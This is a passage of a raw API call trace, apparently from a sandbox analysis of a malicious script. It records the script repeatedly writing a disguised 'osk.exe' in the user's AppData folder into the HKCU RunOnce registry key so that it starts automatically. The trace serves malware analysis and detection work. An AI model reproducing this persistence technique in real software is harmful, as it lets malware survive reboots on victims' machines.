pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.240] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2e [0079.240] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.240] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.240] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.240] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.240] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.240] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.240] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.240] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.241] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.241] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.241] RegCloseKey (hKey=0x280) returned 0x0 [0079.241] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.241] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.241] SetTimer (hWnd=0x20280, nIDEvent=0x202e, uElapse=0xa, lpTimerFunc=0x0) returned 0x202e [0079.241] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.253] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.253] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.254] KillTimer (hWnd=0x20280, uIDEvent=0x202e) returned 1 [0079.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.254] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.254] IUnknown:Release (This=0x787518) returned 0x1 [0079.254] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.254] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.254] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.254] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.254] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.255] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2f [0079.255] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.255] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x30 [0079.255] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.256] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2f [0079.256] ??2@YAPAXI@Z () returned 0x2b51800 [0079.256] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.256] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.256] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.256] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.256] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.256] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.256] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.256] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.256] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.256] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.257] RegCloseKey (hKey=0x280) returned 0x0 [0079.257] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.257] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.257] SetTimer (hWnd=0x20280, nIDEvent=0x202f, uElapse=0xa, lpTimerFunc=0x0) returned 0x202f [0079.257] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.269] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.269] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.269] KillTimer (hWnd=0x20280, uIDEvent=0x202f) returned 1 [0079.269] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.270] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.270] IUnknown:Release (This=0x787518) returned 0x1 [0079.270] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.270] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.270] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.270] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.270] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.270] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.270] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.270] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.270] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.271] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x30 [0079.271] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.271] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x31 [0079.271] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.271] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x30 [0079.271] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.271] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.271] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.272] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.272] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.272] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.272] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.272] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.272] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.272] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.272] RegCloseKey (hKey=0x280) returned 0x0 [0079.272] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.272] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.272] SetTimer (hWnd=0x20280, nIDEvent=0x2030, uElapse=0xa, lpTimerFunc=0x0) returned 0x2030 [0079.273] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.285] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.285] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.285] KillTimer (hWnd=0x20280, uIDEvent=0x2030) returned 1 [0079.285] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.285] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.285] IUnknown:Release (This=0x787518) returned 0x1 [0079.285] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.285] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.286] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.286] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.286] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.286] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.286] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.286] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.286] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.286] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x31 [0079.286] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.286] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x32 [0079.286] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, 